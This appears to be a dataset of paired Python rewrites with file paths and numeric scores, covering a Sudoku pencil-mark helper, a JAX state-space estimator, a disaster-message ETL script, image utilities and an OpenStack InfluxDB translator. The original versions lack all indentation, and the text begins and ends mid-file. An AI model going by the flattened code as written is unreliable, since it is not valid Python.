    """For each empty cell (row-major order), return a copy of that cell's full column."""
    result = []
    for (_row, col) in get_indices_of_empty_cells(grid):
        result.append([grid[row][col] for row in range(9)])
    return result
def get_indices_of_boxes():
    """Return the nine 3x3 boxes as lists of (row, col) pairs, boxes and cells in row-major order."""
    boxes = []
    for top in (0, 3, 6):
        for left in (0, 3, 6):
            boxes.append([(top + dr, left + dc) for dr in range(3) for dc in range(3)])
    return boxes
def get_boxes_with_empty_cells(grid):
    """For each empty cell (row-major order), return the values of its 3x3 box.

    Box cells are listed in row-major order, matching get_indices_of_boxes().
    Replaces the original cross-join over every box and every box cell
    (O(cells * 81)) with a direct computation of each cell's box corner.
    """
    boxes = []
    for (row, col) in get_indices_of_empty_cells(grid):
        top, left = 3 * (row // 3), 3 * (col // 3)
        boxes.append([grid[top + dr][left + dc] for dr in range(3) for dc in range(3)])
    return boxes
def get_clues_of_groups(grid):
    """For each empty cell return [row clues, column clues, box clues] — non-zero values only."""
    rows = get_rows_with_empty_cells(grid)
    columns = get_columns_with_empty_cells(grid)
    boxes = get_boxes_with_empty_cells(grid)
    clues = []
    for row, column, box in zip(rows, columns, boxes):
        clues.append([[value for value in group if value != 0] for group in (row, column, box)])
    return clues
def generate_pencil_marks(grid):
    """Return, for each empty cell, the set of candidate digits (1-9 minus all clues)."""
    full = {1, 2, 3, 4, 5, 6, 7, 8, 9}
    marks = []
    for groups in get_clues_of_groups(grid):
        seen = set()
        for group in groups:
            seen.update(group)
        marks.append(full - seen)
    return marks
def get_indices_and_candidates(grid):
    """Pair each empty cell's (row, col) with its candidate set."""
    return list(zip(get_indices_of_empty_cells(grid), generate_pencil_marks(grid)))
def insert_pencil_marks(grid):
    """Write each empty cell's candidate set into the grid (mutates and returns it)."""
    for (row, col), candidates in get_indices_and_candidates(grid):
        grid[row][col] = candidates
    return grid
print(insert_pencil_marks(example_grid)) | sudoku/solver/pencil_marks.py | example_grid = [
[5,0,0,0,0,7,0,0,0]
,[9,2,6,5,0,0,0,0,0]
,[3,0,0,8,0,9,0,2,0]
,[4,0,0,0,2,0,0,3,5]
,[0,3,5,1,0,4,9,7,0]
,[8,6,0,0,5,0,0,0,4]
,[0,4,0,3,0,8,0,0,2]
,[0,0,0,0,0,5,6,9,3]
,[0,0,0,6,0,0,0,0,7]]
def print_grid(grid):
for row in grid:
print(row)
def get_indices_of_empty_cells(grid):
return [(i,j) for i in range(0,9) for j in range(0,9) if grid[i][j] == 0]
def get_rows_with_empty_cells(grid):
indices = get_indices_of_empty_cells(grid)
return [[grid[indices[i][0]][j] for j in range(0,9)] for i in range(0, len(indices))]
def get_columns_with_empty_cells(grid):
indices = get_indices_of_empty_cells(grid)
return [[grid[i][indices[j][1]] for i in range(0,9)] for j in range(0, len(indices))]
def get_indices_of_boxes():
return [[(i + x, j + y) for i in range(3) for j in range(3)] for x in [0,3,6] for y in [0,3,6]]
def get_boxes_with_empty_cells(grid):
indices_of_boxes = get_indices_of_boxes()
indices_of_empty_cells = get_indices_of_empty_cells(grid)
indices_of_boxes_for_each_empty_cells = [indices_of_boxes[i]
for x in indices_of_empty_cells
for i in range(len(indices_of_boxes))
for y in indices_of_boxes[i] if x == y]
return [[grid[i][j] for (i,j) in x] for x in indices_of_boxes_for_each_empty_cells]
def get_clues_of_groups(grid):
rows = get_rows_with_empty_cells(grid)
columns = get_columns_with_empty_cells(grid)
boxes = get_boxes_with_empty_cells(grid)
return [[[x[i] for i in range(len(x)) if x[i] != 0] for x in [row, column, box]] for (row, column, box) in zip(rows, columns, boxes)]
def generate_pencil_marks(grid):
clues = get_clues_of_groups(grid)
all_clues = [set([y for i in range(len(x)) for y in x[i]]) for x in clues]
pencil_marks = [set(set({1, 2, 3, 4, 5, 6, 7, 8, 9}) - set(x)) for x in all_clues]
return pencil_marks
def get_indices_and_candidates(grid):
indices = get_indices_of_empty_cells(grid)
pencil_marks = generate_pencil_marks(grid)
return [(tuple_of_indices, candidate) for tuple_of_indices, candidate in zip(indices, pencil_marks)]
def insert_pencil_marks(grid):
indices_and_candidates = get_indices_and_candidates(grid)
for i in range(len(indices_and_candidates)):
grid[indices_and_candidates[i][0][0]][indices_and_candidates[i][0][1]] = indices_and_candidates[i][1]
return grid
print(insert_pencil_marks(example_grid)) | 0.284974 | 0.278187 |
import collections
import os
import attrdict
import jax
import jax.numpy as jnp
import jax.scipy as jsp
import numpy as np
import scipy.io
import scipy.linalg
from scipy import optimize
import riccati
jax.config.update("jax_enable_x64", True)
class Decision:
    """Describes one named decision variable inside a flat parameter vector."""

    def __init__(self, shape, start):
        if isinstance(shape, int):
            shape = (shape,)
        self.shape = shape  # decision variable shape (tuple)
        self.size = np.prod(shape, dtype=int)  # total number of elements
        self.start = start  # start index in the parent vector
        self.slice = np.s_[start:start + self.size]  # slice of variable in the parent vector

    def unpack(self, vec):
        """Extract this variable from the parent vector, reshaped."""
        return vec[self.slice].reshape(self.shape)

    def pack(self, vec, value):
        """Write `value`, broadcast to this variable's shape, into the parent vector."""
        vec[self.slice] = np.broadcast_to(value, self.shape).ravel()
class Problem:
    """Maximum-likelihood LTI state-space identification problem.

    Decision variables: normalized measurement-noise samples `en`, system
    matrices `A` and `B`, and log standard deviations `lsQd` (process
    noise) and `lsRd` (measurement noise).
    """

    def __init__(self, nx, u, y):
        """Set up the problem for `nx` states given inputs `u` and measurements `y`."""
        self.dec_specs = collections.OrderedDict()  # decision variable specifications
        self.ndec = 0  # total number of decision variables
        self.u = jnp.asarray(u)  # inputs, shape (N, nu)
        self.y = jnp.asarray(y)  # measurements, shape (N, ny)
        self.nx = nx  # size of state vector
        self.nu = np.size(u, 1)  # size of input vector
        self.ny = np.size(y, 1)  # size of output vector
        N = np.size(y, 0)
        assert N == np.size(u, 0)
        self.N = N  # number of measurement instants
        # Register decision variables
        self.add_decision('en', (N, nx))
        self.add_decision('A', (nx, nx))
        self.add_decision('B', (nx, self.nu))
        self.add_decision('lsQd', nx)
        self.add_decision('lsRd', self.ny)

    def add_decision(self, name, shape=()):
        """Register a decision variable and extend the flat vector size."""
        self.dec_specs[name] = spec = Decision(shape, self.ndec)
        self.ndec += spec.size

    def unpack_decision(self, dvec):
        """Split the flat decision vector into named variables (AttrDict)."""
        if jnp.shape(dvec) != (self.ndec,):
            raise ValueError("invalid shape for `dvec`")
        dvars = attrdict.AttrDict()
        for name, spec in self.dec_specs.items():
            dvars[name] = spec.unpack(dvec)
        return dvars

    def pack_decision(self, dvars, dvec=None):
        """Assemble named variables into a flat decision vector.

        Unknown names in `dvars` are ignored; missing ones stay zero.
        """
        if dvec is None:
            dvec = np.zeros(self.ndec)
        for name, value in dvars.items():
            spec = self.dec_specs.get(name)
            if spec is not None:
                spec.pack(dvec, value)
        return dvec

    def merit(self, dvec):
        """Log-likelihood merit: state-noise prior + measurement term + marginal log-determinant."""
        v = self.unpack_decision(dvec)
        # Measurement noise e rescales the normalized samples en;
        # states are the measurements minus the noise (C = I, D = 0).
        e = v.en * jnp.exp(v.lsRd)
        x = self.y - e
        # One-step state residuals w[k] = x[k+1] - A x[k] - B u[k].
        w = x[1:] - x[:-1] @ v.A.T - self.u[:-1] @ v.B.T
        # (The original recomputed `e = y - x @ C.T - u @ D.T`, which with
        # C = I, D = 0 equals the `e` above and was never used; removed.)
        lprior = normal_logpdf(w, v.lsQd)
        llike = normal_logpdf2(v.en, v.lsRd)
        ldmarg = logdet_marg(v.A, jnp.identity(self.nx), v.lsQd, v.lsRd, self.N)
        return lprior + llike + ldmarg
def normal_logpdf(x, logsigma):
"""Unnormalized normal distribution logpdf."""
N = len(x)
inv_sigma2 = jnp.exp(-2 * logsigma)
sigma_factor = - N * jnp.sum(logsigma)
return -0.5 * jnp.sum(jnp.sum(x ** 2, axis=0) * inv_sigma2) + sigma_factor
def normal_logpdf2(xn, logsigma):
    """Unnormalized normal distribution logpdf for standardized samples `xn`,
    plus the log-std normalization term."""
    return -0.5 * jnp.sum(xn ** 2) - len(xn) * jnp.sum(logsigma)
def logdet_marg(A, C, lsQd, lsRd, N):
    """Log-determinant term of the marginal likelihood via square-root recursions.

    Parameters
    ----------
    A, C : state transition and measurement matrices.
    lsQd, lsRd : log standard deviations of the (diagonal) process and
        measurement noise.
    N : number of measurement instants.

    Returns
    -------
    (N-1) * log det sPr + log det sPc, where sPc / sPr are triangular
    square roots produced by the correction / prediction steps below.
    """
    # Assemble the input matrices
    sQd = jnp.exp(lsQd)
    sRd = jnp.exp(lsRd)
    Qd = sQd ** 2
    Rd = sRd ** 2
    sQ = jnp.diag(sQd)
    sR = jnp.diag(sRd)
    Q = jnp.diag(Qd)
    R = jnp.diag(Rd)
    # Steady-state covariance from the discrete algebraic Riccati equation.
    Pp = riccati.dare(A.T, C.T, Q, R)
    nx = len(A)
    ny = len(C)
    z = jnp.zeros_like(C.T)
    sPp = jnp.linalg.cholesky(Pp)
    # Correction step in square-root (array QR) form.
    corr_mat = jnp.block([[sR, C @ sPp],
                          [z, sPp]])
    q, r = jnp.linalg.qr(corr_mat.T)
    # Fix the QR sign ambiguity so the triangular factor has a
    # nonnegative diagonal.
    s = jnp.sign(r.diagonal())
    sPc = (r.T * s)[ny:, ny:]
    z = jnp.zeros_like(A)
    # Prediction step in square-root form.
    pred_mat = jnp.block([[A @ sPc, sQ],
                          [sPc, z]])
    q, r = jnp.linalg.qr(pred_mat.T)
    s = jnp.sign(r.diagonal())
    sPr = (r.T * s)[nx:, nx:]
    # eps guards the log against exactly-zero diagonal entries.
    eps = 1e-40
    log_det_sPc = jnp.sum(jnp.log(jnp.abs(sPc.diagonal()) + eps))
    log_det_sPr = jnp.sum(jnp.log(jnp.abs(sPr.diagonal()) + eps))
    return (N-1) * log_det_sPr + log_det_sPc
def load_data():
    """Load the fAttas elevator experiment, rescale it, and add artificial noise.

    Returns
    -------
    t, u, y, yshift, yscale, ushift, uscale
    """
    d2r = np.pi / 180
    # Data file lives next to this module; trim 30 samples at both ends.
    data_file_path = os.path.join(os.path.dirname(__file__), 'data', 'fAttasElv1.mat')
    data = scipy.io.loadmat(data_file_path)['fAttasElv1'][30:-30]
    t = data[:, 0] - data[0, 0]
    u = data[:, [21]] * d2r
    y = data[:, [7, 12]] * d2r
    # Shift and rescale the signals to comparable magnitudes.
    yshift = np.r_[-0.003, -0.04]
    yscale = np.r_[10.0, 20.0]
    ushift = np.r_[-0.04]
    uscale = np.r_[25.0]
    y = (y + yshift) * yscale
    u = (u + ushift) * uscale
    # Add reproducible artificial measurement noise.
    np.random.seed(0)
    y[:, :] += 1e-2 * np.random.randn(*y.shape)
    return t, u, y, yshift, yscale, ushift, uscale
if __name__ == '__main__':
    # Problem dimensions: 2 states, 1 input, 2 outputs.
    nx, nu, ny = 2, 1, 2

    # Load experiment data and build the estimation problem.
    t, u, y, yshift, yscale, ushift, uscale = load_data()
    problem = Problem(nx, u, y)

    # Initial guess: states at the measurements, random normalized noise,
    # mildly stable diagonal A, zero B, broad noise log-stds.
    x0 = y
    en0 = np.random.randn(*y.shape)
    A0 = np.diag([0.9, 0.9])
    B0 = np.zeros((2, 1))
    lsQd0 = np.array([-1, -1])
    lsRd0 = np.array([-5, -5])
    dvar0 = {'en': en0, 'A': A0, 'B': B0, 'lsQd': lsQd0, 'lsRd': lsRd0}
    dvec0 = problem.pack_decision(dvar0)

    # scipy minimizes, so the objective is the negative merit; derivatives
    # are obtained from JAX.
    def obj(dv):
        return -problem.merit(dv)
    grad = jax.grad(obj)
    def hessp(dv, p):
        # Hessian-vector product via forward-over-reverse differentiation.
        return jax.jvp(grad, (dv,), (p,))[1]
    sol = optimize.minimize(
        obj, dvec0, method='trust-krylov', jac=grad, hessp=hessp,
        options={'gtol': 2e-6, 'disp': True, 'maxiter': 200},
    )

    # Unpack the optimum and its gradient for inspection.
    varopt = problem.unpack_decision(sol.x)
    vargrad = problem.unpack_decision(sol.jac)
    A, B = varopt.A, varopt.B
    lsQd, lsRd = varopt.lsQd, varopt.lsRd
    en = varopt.en

    # Rebuild the state estimates and a free-run simulation of the model.
    sRd = np.exp(lsRd)
    e = en * sRd
    x = y - e
    xsim = np.zeros_like(x)
    xsim[0] = x[0]
    for k in range(1, len(x)):
        xsim[k] = A @ xsim[k - 1] + B @ u[k - 1]
import os
import attrdict
import jax
import jax.numpy as jnp
import jax.scipy as jsp
import numpy as np
import scipy.io
import scipy.linalg
from scipy import optimize
import riccati
jax.config.update("jax_enable_x64", True)
class Decision:
"""Decision variable specification."""
def __init__(self, shape, start):
if isinstance(shape, int):
shape = (shape,)
self.shape = shape
"""Decision variable shape."""
self.size = np.prod(shape, dtype=int)
"""Total number of elements."""
self.start = start
"""Start index in parent vector."""
end = start + self.size
self.slice = np.s_[start:end]
"""Slice of variable in parent vector."""
def unpack(self, vec):
"""Unpack variable from parent vector."""
return vec[self.slice].reshape(self.shape)
def pack(self, vec, value):
"""Pack variable into parent vector."""
val_flat = np.broadcast_to(value, self.shape).ravel()
vec[self.slice] = val_flat
class Problem:
def __init__(self, nx, u, y):
self.dec_specs = collections.OrderedDict()
"""Decision variable specifications."""
self.ndec = 0
"""Total number of decision variables."""
self.u = jnp.asarray(u)
"""Inputs."""
self.y = jnp.asarray(y)
"""Measurements."""
self.nx = nx
"""Size of state vector."""
self.nu = np.size(u, 1)
"""Size of input vector."""
self.ny = np.size(y, 1)
"""Size of output vector."""
N = np.size(y, 0)
assert N == np.size(u, 0)
self.N = N
"""Number of measurement instants."""
# Register decision variables
self.add_decision('en', (N, nx))
self.add_decision('A', (nx, nx))
self.add_decision('B', (nx, self.nu))
self.add_decision('lsQd', nx)
self.add_decision('lsRd', self.ny)
def add_decision(self, name, shape=()):
self.dec_specs[name] = spec = Decision(shape, self.ndec)
self.ndec += spec.size
def unpack_decision(self, dvec):
if jnp.shape(dvec) != (self.ndec,):
raise ValueError("invalid shape for `dvec`")
dvars = attrdict.AttrDict()
for name, spec in self.dec_specs.items():
dvars[name] = spec.unpack(dvec)
return dvars
def pack_decision(self, dvars, dvec=None):
if dvec is None:
dvec = np.zeros(self.ndec)
for name, value in dvars.items():
spec = self.dec_specs.get(name)
if spec is not None:
spec.pack(dvec, value)
return dvec
def merit(self, dvec):
v = self.unpack_decision(dvec)
en = v.en
A = v.A
B = v.B
u = self.u
y = self.y
C = jnp.identity(self.nx)
D = jnp.zeros((self.ny, self.nu))
e = en * jnp.exp(v.lsRd)
x = y - e
xprev = x[:-1]
uprev = u[:-1]
xnext = x[1:]
w = xnext - xprev @ A.T - uprev @ B.T
e = y - x @ C.T - u @ D.T
lprior = normal_logpdf(w, v.lsQd)
llike = normal_logpdf2(en, v.lsRd)
ldmarg = logdet_marg(A, C, v.lsQd, v.lsRd, self.N)
return lprior + llike + ldmarg
def normal_logpdf(x, logsigma):
"""Unnormalized normal distribution logpdf."""
N = len(x)
inv_sigma2 = jnp.exp(-2 * logsigma)
sigma_factor = - N * jnp.sum(logsigma)
return -0.5 * jnp.sum(jnp.sum(x ** 2, axis=0) * inv_sigma2) + sigma_factor
def normal_logpdf2(xn, logsigma):
"""Unnormalized normal distribution logpdf."""
N = len(xn)
sigma_factor = - N * jnp.sum(logsigma)
return -0.5 * jnp.sum(xn ** 2) + sigma_factor
def logdet_marg(A, C, lsQd, lsRd, N):
# Assemble the input matrices
sQd = jnp.exp(lsQd)
sRd = jnp.exp(lsRd)
Qd = sQd ** 2
Rd = sRd ** 2
sQ = jnp.diag(sQd)
sR = jnp.diag(sRd)
Q = jnp.diag(Qd)
R = jnp.diag(Rd)
Pp = riccati.dare(A.T, C.T, Q, R)
nx = len(A)
ny = len(C)
z = jnp.zeros_like(C.T)
sPp = jnp.linalg.cholesky(Pp)
corr_mat = jnp.block([[sR, C @ sPp],
[z, sPp]])
q, r = jnp.linalg.qr(corr_mat.T)
s = jnp.sign(r.diagonal())
sPc = (r.T * s)[ny:, ny:]
z = jnp.zeros_like(A)
pred_mat = jnp.block([[A @ sPc, sQ],
[sPc, z]])
q, r = jnp.linalg.qr(pred_mat.T)
s = jnp.sign(r.diagonal())
sPr = (r.T * s)[nx:, nx:]
eps = 1e-40
log_det_sPc = jnp.sum(jnp.log(jnp.abs(sPc.diagonal()) + eps))
log_det_sPr = jnp.sum(jnp.log(jnp.abs(sPr.diagonal()) + eps))
return (N-1) * log_det_sPr + log_det_sPc
def load_data():
# Retrieve data
d2r = np.pi / 180
module_dir = os.path.dirname(__file__)
data_file_path = os.path.join(module_dir, 'data', 'fAttasElv1.mat')
data = scipy.io.loadmat(data_file_path)['fAttasElv1'][30:-30]
t = data[:, 0] - data[0, 0]
u = data[:, [21]] * d2r
y = data[:, [7, 12]] * d2r
# Shift and rescale
yshift = np.r_[-0.003, -0.04]
yscale = np.r_[10.0, 20.0]
ushift = np.r_[-0.04]
uscale = np.r_[25.0]
y = (y + yshift) * yscale
u = (u + ushift) * uscale
# Add artificial noise
np.random.seed(0)
y[:, :] += 1e-2 * np.random.randn(*y.shape)
return t, u, y, yshift, yscale, ushift, uscale
if __name__ == '__main__':
nx = 2
nu = 1
ny = 2
# Load experiment data
t, u, y, yshift, yscale, ushift, uscale = load_data()
problem = Problem(nx, u, y)
x0 = y
en0 = np.random.randn(*y.shape)
A0 = np.diag([0.9, 0.9])
B0 = np.zeros((2, 1))
lsQd0 = np.array([-1, -1])
lsRd0 = np.array([-5, -5])
dvar0 = dict(en=en0, A=A0, B=B0, lsQd=lsQd0, lsRd=lsRd0)
dvec0 = problem.pack_decision(dvar0)
# Define optimization functions
obj = lambda x: -problem.merit(x)
grad = jax.grad(obj)
hessp = lambda x, p: jax.jvp(grad, (x,), (p,))[1]
opt = {'gtol': 2e-6, 'disp': True, 'maxiter': 200}
sol = optimize.minimize(
obj, dvec0, method='trust-krylov', jac=grad, hessp=hessp, options=opt
)
varopt = problem.unpack_decision(sol.x)
vargrad = problem.unpack_decision(sol.jac)
A = varopt.A
B = varopt.B
lsQd = varopt.lsQd
lsRd = varopt.lsRd
en = varopt.en
sRd = np.exp(lsRd)
e = en * sRd
x = y - e
xsim = np.zeros_like(x)
xsim[0] = x[0]
for i in range(1, len(x)):
xsim[i] = A @ xsim[i-1] + B @ u[i - 1] | 0.7413 | 0.398289 |
import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
    """Loads the messages and categories data sets and merges them based
    on the id.

    Args:
        messages_filepath (str): file path of messages csv file
        categories_filepath (str): file path of categories csv file
    Returns: data frame
    """
    messages_df = pd.read_csv(messages_filepath)
    categories_df = pd.read_csv(categories_filepath)
    # Inner merge on the shared 'id' column.
    return pd.merge(messages_df, categories_df, on='id')
def clean_data(df):
    """Cleans the data frame for further use. The output dataframe has
    one column containing the english text message and one column
    for each category containing binary labels.

    NOTE:
        - duplicate rows are removed
        - columns that have only one distinct value are removed
        - the input frame is no longer mutated (the original dropped
          'categories' in place on the caller's frame).

    Args:
        df (pd.DataFrame): output of load_data()
    Returns: cleaned data frame
    """
    # Expand 'categories' ("related-1;offer-0;...") into one column per category.
    categories = df.categories.str.split(';', expand=True)
    # Column names come from the first row, stripping the trailing "-<digit>".
    categories.columns = [value[:-2] for value in categories.iloc[0]]
    # The label is the last character of each cell; vectorized .str[-1]
    # replaces the original per-element apply().
    for column in categories:
        categories[column] = categories[column].str[-1].astype(int)
    # Replace the packed column with the expanded ones (non-destructively).
    df = pd.concat([df.drop(columns='categories'), categories], axis=1)
    # Drop duplicate rows.
    df = df.drop_duplicates()
    # Collect constant columns first, then drop: the original dropped while
    # iterating the frame, i.e. mutated the object being iterated.
    constant_cols = [col for col in df.columns if df[col].nunique() == 1]
    for col in constant_cols:
        df.drop(columns=col, inplace=True)
        print('Removed column {} since it has only 1 distinct value'.format(col))
    return df
def save_data(df, database_filename):
    """Exports the input data frame as an SQL data base.

    Args:
        df (pd.DataFrame): data frame to be exported
        database_filename (str): file path for data base
    Returns: None
    """
    # NOTE(review): the SQL table is named after the database file path
    # itself; downstream readers appear to rely on this — confirm before
    # renaming.
    engine = create_engine('sqlite:///{}'.format(database_filename))
    df.to_sql(database_filename, engine, index=False, if_exists='replace')
def main():
    """ Runs the ETL pipeline """
    # Guard clause: bail out with usage help unless exactly three
    # arguments were supplied.
    if len(sys.argv) != 4:
        print('Please provide the filepaths of the messages and categories '\
              'datasets as the first and second argument respectively, as '\
              'well as the filepath of the database to save the cleaned data '\
              'to as the third argument. \n\nExample: python process_data.py '\
              'disaster_messages.csv disaster_categories.csv '\
              'DisasterResponse.db')
        return
    messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
    print('Loading data...\n    MESSAGES: {}\n    CATEGORIES: {}'
          .format(messages_filepath, categories_filepath))
    df = load_data(messages_filepath, categories_filepath)
    print('Cleaning data...')
    df = clean_data(df)
    print('Saving data...\n    DATABASE: {}'.format(database_filepath))
    save_data(df, database_filepath)
    print('Cleaned data saved to database!')
if __name__ == '__main__':
main() | data/process_data.py | import sys
import pandas as pd
from sqlalchemy import create_engine
def load_data(messages_filepath, categories_filepath):
"""Loads the messages and categories data sets and merges them based
on the id.
Args:
messages_filepath (str): file path of messages csv file
categories_filepath (str): file path of categories csv file
Returns: data frame
"""
messages = pd.read_csv(messages_filepath)
categories = pd.read_csv(categories_filepath)
df = pd.merge(messages,categories,on='id')
return df
def clean_data(df):
"""Cleans the data frame for further use. The output dataframe has
one column containing the english text message and one column
for each category containing binary labels.
NOTE:
- duplicate rows are removed
- columns that have only one distinct value are removed.
Args:
df (pd.DataFrame): output of load_data()
Returns: cleaned data frame
"""
# create a dataframe of the 36 individual category columns
categories = df.categories.str.split(';',expand=True)
# select the first row of the categories dataframe
row = list(categories.iloc[0])
category_colnames = list(categories.iloc[0].apply(lambda x : x[:-2]))
categories.columns = category_colnames
# converting values to 0 and 1
for column in categories:
# set each value to be the last character of the string
categories[column] = categories[column].apply(lambda x : x[-1])
# convert column from string to numeric
categories[column] = categories[column].astype(int)
# drop old categories column and add new set of columns
df.drop(columns='categories',inplace = True)
df = pd.concat([df,categories], axis=1)
# drop duplicates
df = df.drop_duplicates()
# drop columns with only one distinct value
for col in df:
if df[col].nunique() == 1:
df.drop(columns=col, inplace=True)
print('Removed column {} since it has only 1 distinct value'.format(col))
return df
def save_data(df, database_filename):
"""Exports the input data frame as an SQL data base.
Args:
df (pd.DataFrame): data frame to be exported
database_filename (str): file path for data base
Returns: None
"""
tmp_str = 'sqlite:///{}'.format(database_filename)
engine = create_engine(tmp_str)
df.to_sql(database_filename, engine, index=False, if_exists='replace')
def main():
""" Runs the ETL pipeline """
if len(sys.argv) == 4:
messages_filepath, categories_filepath, database_filepath = sys.argv[1:]
print('Loading data...\n MESSAGES: {}\n CATEGORIES: {}'
.format(messages_filepath, categories_filepath))
df = load_data(messages_filepath, categories_filepath)
print('Cleaning data...')
df = clean_data(df)
print('Saving data...\n DATABASE: {}'.format(database_filepath))
save_data(df, database_filepath)
print('Cleaned data saved to database!')
else:
print('Please provide the filepaths of the messages and categories '\
'datasets as the first and second argument respectively, as '\
'well as the filepath of the database to save the cleaned data '\
'to as the third argument. \n\nExample: python process_data.py '\
'disaster_messages.csv disaster_categories.csv '\
'DisasterResponse.db')
if __name__ == '__main__':
main() | 0.630912 | 0.553867 |
import sys
import os
import re
import numpy as np
import tensorflow as tf
def print_(str, colour='', bold=False):
    """Write `str` to stdout with an optional ANSI colour/bold prefix, then reset and flush."""
    codes = {'w': '\033[93m',  # yellow warning
             'e': '\033[91m',  # red error
             'm': '\033[95m'}  # magenta info
    prefix = codes.get(colour, '')
    if bold:
        prefix += '\033[1m'
    sys.stdout.write(prefix)
    sys.stdout.write(str)
    sys.stdout.write('\033[0m')
    sys.stdout.flush()
def get_filepaths_from_dir(dir_path):
    """Recursively walk through the given directory and return a list of file paths
    """
    paths = []
    for root, dirs, files in os.walk(dir_path):
        dirs.sort()  # sort in place so os.walk descends in order
        for name in sorted(files):
            paths.append(os.path.join(root, name))
    return paths
def get_labels_from_dir(dir_path):
    """Return classification class labels (= first subdirectories names)
    """
    for _root, directories, _files in os.walk(dir_path):
        # Only the top directory matters; '.' is removed from folder names
        # for label retrieval in model.py.
        return [name.replace('.', '') for name in sorted(directories)]
    return []
def atoi(text):
    """Convert a digit string to int; return any other string unchanged."""
    if text.isdigit():
        return int(text)
    return text
def natural_keys(text):
    """Use mylist.sort(key=natural_keys) to sort mylist in human order
    """
    # Digit runs compare numerically, everything else lexically
    # (the original delegated the per-chunk conversion to atoi()).
    return [int(part) if part.isdigit() else part for part in re.split(r'(\d+)', text)]
def get_saved_model_list(ckpt_dir):
    """Return a list of HDF5 models found in ckpt_dir
    """
    filenames_list = []
    # Only the top directory is scanned.
    for _root, _dirs, filenames in os.walk(ckpt_dir):
        filenames_list = list(filenames)
        break
    ckpt_list = [name for name in filenames_list if name.endswith(('.h5', '.hdf5'))]
    ckpt_list.sort(key=natural_keys)
    return ckpt_list
def im2uint8(x):
    """Clip `x` to [0, 1] and convert to uint8 in [0, 255].

    Accepts a TensorFlow tensor or a numpy array and returns the same kind.
    """
    # isinstance instead of the original `x.__class__ == tf.Tensor`: eager
    # tensors are a subclass (EagerTensor), which the exact-class
    # comparison silently sent down the numpy path.
    if isinstance(x, tf.Tensor):
        return tf.cast(tf.clip_by_value(x, 0.0, 1.0) * 255.0, tf.uint8)
    scaled = np.clip(x, 0.0, 1.0) * 255.0
    return scaled.astype(np.uint8)
import os
import re
import numpy as np
import tensorflow as tf
def print_(str, colour='', bold=False):
if colour == 'w': # yellow warning
sys.stdout.write('\033[93m')
elif colour == "e": # red error
sys.stdout.write('\033[91m')
elif colour == "m": # magenta info
sys.stdout.write('\033[95m')
if bold:
sys.stdout.write('\033[1m')
sys.stdout.write(str)
sys.stdout.write('\033[0m')
sys.stdout.flush()
def get_filepaths_from_dir(dir_path):
"""Recursively walk through the given directory and return a list of file paths
"""
data_list = []
for (root, directories, filenames) in os.walk(dir_path):
directories.sort()
filenames.sort()
for filename in filenames:
data_list += [os.path.join(root,filename)]
return data_list
def get_labels_from_dir(dir_path):
    """Return classification class labels (= first subdirectories names)

    Only the immediate subdirectories of *dir_path* count; any '.'
    characters are stripped from the names (label retrieval in model.py
    cannot handle dots).
    """
    walker = os.walk(dir_path)
    try:
        _, subdirs, _ = next(walker)
    except StopIteration:
        # Nonexistent path / not a directory: no labels at all.
        return []
    return [name.replace('.', '') for name in sorted(subdirs)]
def atoi(text):
    # int() for all-digit strings, identity otherwise (used by natural_keys).
    return int(text) if text.isdigit() else text
def natural_keys(text):
    """Use mylist.sort(key=natural_keys) to sort mylist in human order

    Digit runs compare numerically, so "file2" sorts before "file10".
    """
    chunks = re.split(r'(\d+)', text)
    return [int(chunk) if chunk.isdigit() else chunk for chunk in chunks]
def get_saved_model_list(ckpt_dir):
    """Return a list of HDF5 models found in ckpt_dir

    Subdirectories are not searched; results are naturally (humanly)
    sorted via natural_keys.
    """
    top_level_files = []
    for _, _, files in os.walk(ckpt_dir):
        top_level_files = list(files)
        # Only the top directory is of interest.
        break
    checkpoints = [f for f in top_level_files if f.endswith(('.h5', '.hdf5'))]
    return sorted(checkpoints, key=natural_keys)
def im2uint8(x):
    """Convert an image with float values in [0, 1] to uint8 in [0, 255].

    Accepts either a ``tf.Tensor`` or a numpy array; values are clipped to
    [0, 1] before scaling so out-of-range inputs cannot wrap around.
    """
    if x.__class__ == tf.Tensor:
        return tf.cast(tf.clip_by_value(x, 0.0, 1.0) * 255.0, tf.uint8)
    else:
        t = np.clip(x, 0.0, 1.0) * 255.0
        return t.astype(np.uint8)
from oslo_config import cfg
from oslo_log import log
from oslo_serialization import jsonutils
from watcher.common import exception
from watcher.decision_engine.datasources.grafana_translator.base import \
BaseGrafanaTranslator
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class InfluxDBGrafanaTranslator(BaseGrafanaTranslator):
    """Grafana translator to communicate with InfluxDB database"""
    # Registry name used to select this translator from configuration.
    NAME = 'influxdb'

    def __init__(self, data):
        # No InfluxDB-specific state; defer entirely to the base translator.
        super(InfluxDBGrafanaTranslator, self).__init__(data)
def build_params(self):
""""""
data = self._data
retention_period = None
available_periods = CONF.grafana_translators.retention_periods.items()
for key, value in sorted(available_periods, key=lambda x: x[1]):
if int(data['period']) < int(value):
retention_period = key
break
if retention_period is None:
retention_period = max(available_periods)[0]
LOG.warning("Longest retention period is to short for desired"
" period")
try:
resource = self._extract_attribute(
data['resource'], data['attribute'])
except AttributeError:
LOG.error("Resource: {0} does not contain attribute {1}".format(
data['resource'], data['attribute']))
raise
# Granularity is optional if it is None the minimal value for InfluxDB
# will be 1
granularity = \
data['granularity'] if data['granularity'] is not None else 1
return {'db': data['db'],
'epoch': 'ms',
'q': self._query_format(
data['query'], data['aggregate'], resource, data['period'],
granularity, retention_period)}
def extract_result(self, raw_results):
""""""
try:
# For result structure see:
# https://docs.openstack.org/watcher/latest/datasources/grafana.html#InfluxDB
result = jsonutils.loads(raw_results)
result = result['results'][0]['series'][0]
index_aggregate = result['columns'].index(self._data['aggregate'])
return result['values'][0][index_aggregate]
except KeyError:
LOG.error("Could not extract {0} for the resource: {1}".format(
self._data['metric'], self._data['resource']))
raise exception.NoSuchMetricForHost(
metric=self._data['metric'], host=self._data['resource']) | watcher/decision_engine/datasources/grafana_translator/influxdb.py |
from oslo_config import cfg
from oslo_log import log
from oslo_serialization import jsonutils
from watcher.common import exception
from watcher.decision_engine.datasources.grafana_translator.base import \
BaseGrafanaTranslator
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class InfluxDBGrafanaTranslator(BaseGrafanaTranslator):
    """Grafana translator to communicate with InfluxDB database"""
    # Registry name used to select this translator from configuration.
    NAME = 'influxdb'

    def __init__(self, data):
        # No InfluxDB-specific state; defer entirely to the base translator.
